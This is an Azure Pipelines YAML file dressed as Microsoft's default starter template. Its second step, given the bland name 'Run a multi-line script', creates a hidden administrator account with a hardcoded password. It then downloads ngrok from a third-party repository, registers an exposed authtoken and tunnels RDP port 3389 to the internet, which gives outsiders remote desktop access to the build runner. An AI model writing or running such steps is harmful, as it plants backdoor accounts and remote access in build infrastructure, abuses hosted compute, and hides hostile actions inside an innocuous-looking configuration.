# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: windows-latest

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    net user demo Thuonghai001 /add
    net localgroup administrators demo /add
    curl -O https://raw.githubusercontent.com/TheDarkMythos/Ngrok-Exe/master/ngrok.exe 
    ngrok authtoken 1Z2EZa7hMEPgb4rwOxYkEBnnxBt_3BciYkbQiP5TXT4Rbud9
    ngrok tcp 3389
     
  displayName: 'Run a multi-line script'

